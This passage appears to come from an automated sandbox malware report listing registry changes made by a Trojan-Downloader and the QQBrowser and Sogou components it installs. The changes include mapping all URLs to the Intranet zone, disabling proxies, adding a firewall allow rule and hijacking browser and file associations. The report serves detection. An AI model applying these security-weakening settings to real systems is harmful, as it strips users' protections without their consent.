"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B6 78 02 98 D2 01 24 D7 56 E5 8A 49 2D E0 52 BE"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Downloader deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process minidownload.exe:1832 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2B 38 B2 65 2F 04 64 19 1F 81 2F B8 FB 23 49 11"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process MiniTPFw.exe:500 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3C FD A0 52 F9 59 D1 C5 77 0C F8 E0 43 8B 5E 74"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\SogouSoftware\download\download]
"ThunderFW.exe" = "ThunderFW"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process ThunderFW.exe:568 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 90 D9 B6 D4 A7 05 4E 04 F1 E2 DB CB 8C CE 8F"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\SogouSoftware\download\download]
"MiniThunderPlatform.exe" = "%Program Files%\SogouSoftware\download\download\MiniThunderPlatform.exe:*:Enabled:MiniThunderPlatform2016-05-1910:13:05"

The process %original file name%.exe:856 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\SogouSoftware]
"unc" = "sogousoftware_normal"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"minidownload.exe" = "软件助手安装包"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A3 C8 DB FF 01 2B 73 E0 84 C0 C0 47 6D 2E 7D 29"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\SogouSoftware]
"SogouSoftware.exe" = "软件助手"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Downloader deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process QQBrowser.exe:1268 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "67 A3 41 FA F1 90 83 C8 E7 5A D9 29 47 2D DB 74"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Tencent\TodayDo]
"QBRepairPath" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Extensions\ghgfpcpdfhmoghgepjalhnielnlemggj\9.0.0.31_0\BrowserProtect18.exe"

[HKCU\Software\Tencent\QQBrowser\Scopes\2328_573875]
"CrashRecord" = "9B 85 4A 96 02 00 00 00 00 00 00 00 00 00 00 00"

[HKCU\Software\Tencent\TodayDo]
"FixQb" = "2016051910"

The process QQBrowser.exe:2328 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 9B 9A BA A5 1D FB 6A 8F C2 51 FA 4A 2D 16 59"

[HKCU\Software\Tencent\QQBrowser\Scopes\2328_573875]
"CrashRecord" = "9B 85 4A 96 00 00 00 00 00 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

The process QQBrowser.exe:2612 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "96 79 82 46 12 C5 D6 31 D4 75 61 52 77 2A 09 79"

The process QQBrowser.exe:3756 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "09 31 32 8C 58 7D 9A 34 EE 99 57 AB CF 0A 85 53"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

The process QQBrowser.exe:3532 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C6 F7 B0 A2 E2 F6 82 D7 82 E0 A3 4A A1 17 17 23"

The process QQBrowser.exe:2196 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKCR\QQBrowser.Protocol]
"(Default)" = "QQBrowser Protocol"

[HKCR\CLSID\{0002DF01-0000-0000-C000-000000000046}\LocalServer32]
"(Default)" = "%Program Files%\Internet Explorer\iexplore.exe"

[HKCR\Tencent.QQBrowser.Default\.exe\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe %*"

[HKCR\QQBrowser.File\DefaultIcon]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe,0"

[HKCR\QQBrowser.Protocol\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe -- %1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCR\QQBrowser.File\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe -- %1"

[HKCR\Tencent.QQBrowser.Default\.exe\shell]
"(Default)" = "open"

[HKLM\SOFTWARE\Tencent\QQBrowser\Capabilities\FileAssociations]
".xhtml" = "QQBrowser.File"

[HKLM\SOFTWARE\Tencent\QQBrowser\Capabilities\URLAssociations]
"http" = "QQBrowser.Protocol"

[HKLM\SOFTWARE\RegisteredApplications]
"QQBrowser" = "Software\Tencent\QQBrowser\Capabilities"

[HKCU\Software\Tencent\QQBrowser\Scopes\2196_573875]
"CrashRecord" = "9B 85 4A 96 00 00 00 00 00 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Tencent\QQBrowser\Capabilities\FileAssociations]
".xht" = "QQBrowser.File"

[HKCR\QQBrowser.Protocol\shell]
"(Default)" = "open"

[HKLM\SOFTWARE\Tencent\QQBrowser\CurrentVersion\App Paths\QQBrowser.exe]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe"

[HKCR\QQBrowser.Protocol\DefaultIcon]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe,0"

[HKCR\QQBrowser.File]
"URL Protocol" = ""

[HKCR\QQBrowser.File\shell]
"(Default)" = "open"

[HKLM\SOFTWARE\Tencent\QQBrowser\Capabilities\FileAssociations]
".mht" = "QQBrowser.File"
".mhtml" = "QQBrowser.File"

[HKCR\Tencent.QQBrowser.Default\.exe\shell\run\command]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe %*"

[HKLM\SOFTWARE\Tencent\QQBrowser\Capabilities\FileAssociations]
".shtml" = "QQBrowser.File"

[HKCR\QQBrowser.File]
"AppUserModelID" = "Tencent.QQBrowser.Default"

[HKCR\QQBrowser.Protocol]
"URL Protocol" = ""

[HKLM\SOFTWARE\Tencent\QQBrowser\Capabilities\FileAssociations]
".htm" = "QQBrowser.File"

[HKCR\QQBrowser.Protocol]
"AppUserModelID" = "Tencent.QQBrowser.Default"

[HKLM\SOFTWARE\Tencent\QQBrowser\Capabilities\FileAssociations]
".html" = "QQBrowser.File"

[HKCR\QQBrowser.File]
"(Default)" = "QQBrowser HTML Document"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "93 16 C4 7D B6 D7 B2 B9 52 0D 3B C7 5E 68 4C CA"

[HKLM\SOFTWARE\Tencent\QQBrowser\Capabilities\URLAssociations]
"https" = "QQBrowser.Protocol"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\QQBrowser.exe]
"Path" = "%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser"

[HKLM\SOFTWARE\Tencent\QQBrowser\Capabilities]
"ApplicationName" = "QQBrowser"

[HKCU\Software\Tencent\QQBrowser\http\shell\open\command]
"(Default)" = "%Program Files%\Internet Explorer\iexplore.exe -nohome"

[HKLM\SOFTWARE\Tencent\QQBrowser\Capabilities\URLAssociations]
"ftp" = "QQBrowser.Protocol"

[HKLM\SOFTWARE\Tencent\QQBrowser\Capabilities]
"ApplicationDescription" = "QQBrowser"

The Trojan-Downloader deletes the following value(s) in system registry:

[HKCR\Tencent.QQBrowser.Default\.exe\shell\open\command]
"DelegateExecute"

[HKCR\Tencent.QQBrowser.Default\.exe\shell\run\command]
"DelegateExecute"

The process QQBrowser.exe:3736 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4B 8B CE 25 4F 76 77 19 AB 58 AA 87 CF 29 2C 32"

[HKCU\Software\Tencent\QQBrowser\Scopes\2328_573875]
"CrashRecord" = "9B 85 4A 96 02 00 00 00 00 00 00 00 00 00 00 00"

The process QQBrowser.exe:2944 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "81 F0 7F 7C 82 DB C0 01 18 0A AD BF B5 17 CE 68"

[HKCU\Software\Tencent\QQBrowser\Scopes\2328_573875]
"CrashRecord" = "9B 85 4A 96 00 00 00 00 00 00 00 00 00 00 00 00"

The process QQBrowser.exe:3652 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "57 0A 20 11 21 B8 EE 91 72 FD B4 F6 56 82 97 86"

[HKCU\Software\Tencent\QQBrowser\Scopes\2328_573875]
"CrashRecord" = "9B 85 4A 96 02 00 00 00 00 00 00 00 00 00 00 00"

The process QQBrowser.exe:3128 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E9 0E 93 12 91 FB 0E 3D 3D 72 FA 12 25 89 16 2B"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Tencent\QQBrowser\Scopes\2328_573875]
"CrashRecord" = "9B 85 4A 96 00 00 00 00 00 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data\QB]
"TsService.exe" = "TsService"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan-Downloader modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan-Downloader deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Tencent\QQBrowser]
"S3"
"S4"

The process QQBrowser.exe:1968 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C1 DE 38 4F A4 BD A8 8A 13 37 A6 F7 E6 94 7D 1A"

The process QQBrowser.exe:3472 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E8 19 5C EA A0 C3 18 19 B8 9C 20 AC 55 CA F9 D5"

[HKCU\Software\Classes\ftp\shell\open\ddeexec]
"(Default)" = ""

[HKCU\Software\Classes\ftp\shell]
"(Default)" = "open"

[HKCU\Software\Classes\http\shell\open\ddeexec]
"(Default)" = ""

[HKCU\Software\Classes\ftp\DefaultIcon]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe,0"

[HKCU\Software\Classes\https\shell]
"(Default)" = "open"

[HKCU\Software\Classes\http\shell]
"(Default)" = "open"

[HKCU\Software\Classes\https\shell\open\ddeexec]
"(Default)" = ""

[HKCU\Software\Tencent\QQBrowser\Scopes\2328_573875]
"CrashRecord" = "9B 85 4A 96 02 00 00 00 00 00 00 00 00 00 00 00"

[HKCU\Software\Classes\http\DefaultIcon]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe,0"

[HKCU\Software\Classes\https\DefaultIcon]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe,0"

[HKCU\Software\Classes\https\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe -- %1"

[HKCU\Software\Classes\http\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe -- %1"

[HKCU\Software\Classes\ftp\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\QQBrowser.exe -- %1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

The Trojan-Downloader deletes the following value(s) in system registry:

[HKCU\Software\Tencent\QQBrowser\Launch]
"Relauch"

The process QQBrowser.exe:3028 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:

[HKCU\Software\Classes\Software\Tencent\QQBrowser\progid\https\UserChoice]
"Progid" = "QQBrowser.Protocol"

[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\html\PersistentHandler]
"(Default)" = "{eec97550-47a9-11cf-b952-00aa0051fe20}"

[HKCU\Software\Tencent\QQBrowser\Scopes\2328_573875]
"CrashRecord" = "9B 85 4A 96 00 00 00 00 00 00 00 00 00 00 00 00"

[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\xht\UserChoice]
"Hash" = "3zpRgqkXzls="

[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\html]
"PerceivedType" = "text"

[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\shtml]
"(Default)" = "QQBrowser.File"

[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\htm\UserChoice]
"Hash" = "MRqnJxyt1mo="

[HKCU\Software\Classes\Software\Tencent\QQBrowser\progid\ftp]
"Hash" = "NhraD0/5Dwo="

[HKCU\Software\Classes\Software\Tencent\QQBrowser\progid\http\UserChoice]
"Hash" = "2Wt0kbHDnFk="

[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\html\UserChoice]
"Progid" = "QQBrowser.File"

[HKCU\Software\Classes\Software\Tencent\QQBrowser\progid\https\UserChoice]
"Hash" = "xsLOy1tlz4o="

[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\mhtml]
"(Default)" = "mhtmlfile"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\xht]
"(Default)" = "QQBrowser.File"

[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\mhtml]
"Content Type" = "message/rfc822"

[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\mht]
"(Default)" = "mhtmlfile"

[HKCU\Software\Classes\Software\Tencent\QQBrowser\progid\ftp\UserChoice]
"Progid" = "QQBrowser.Protocol"

[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\mht\UserChoice]
"Progid" = "QQBrowser.File"

[HKCU\Software\Classes\Software\Tencent\QQBrowser\progid\ftp]
"Progid" = "QQBrowser.Protocol"

[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\htm]
"(Default)" = "htmlfile"

[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\htm\PersistentHandler]
"(Default)" = "{eec97550-47a9-11cf-b952-00aa0051fe20}"

[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\xhtml\UserChoice]
"Hash" = "neEWU 3HcOo="

[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\shtml\UserChoice]
"Progid" = "QQBrowser.File"

[HKLM\System\CurrentControlSet\Services\TsQBDrv]
"SID" = "S-1-5-21-1844237615-1960408961-1801674531-1003"

[HKCU\Software\Classes\Software\Tencent\QQBrowser\progid\http]
"Progid" = "QQBrowser.Protocol"

[HKCU\Software\Tencent\QQBrowser\Advanced]
"DrvInstalled" = "1"

[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\shtml]
"PerceivedType" = "text"

[HKLM\System\CurrentControlSet\Services\TsQBDrv]
"QBInstallPath" = "%Documents and Settings%\%current user%\Application Data\QB"

[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\mht]
"Content Type" = "message/rfc822"

[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\xht\UserChoice]
"Progid" = "QQBrowser.File"

[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\html]
"Content Type" = "text/html"

[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\shtml\UserChoice]
"Hash" = "evcNM68HiKk="

[HKCU\Software\Classes\Software\Tencent\QQBrowser\progid\http\UserChoice]
"Progid" = "QQBrowser.Protocol"

[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\mhtml\UserChoice]
"Progid" = "QQBrowser.File"

[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\html\UserChoice]
"Hash" = "pvfU5pRLIDU="

[HKCU\Software\Classes\Software\Tencent\QQBrowser\progid\ftp\UserChoice]
"Hash" = "NhraD0/5Dwo="

[HKLM\System\CurrentControlSet\Services\TsQBDrv]
"BSOD" = "0"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "82 AF 3E 3F 6C C0 B3 70 A6 A3 74 0C 26 07 99 7B"

[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\htm\UserChoice]
"Progid" = "QQBrowser.File"

[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\html]
"(Default)" = "htmlfile"

[HKCU\Software\Classes\Software\Tencent\QQBrowser\file\xhtml]
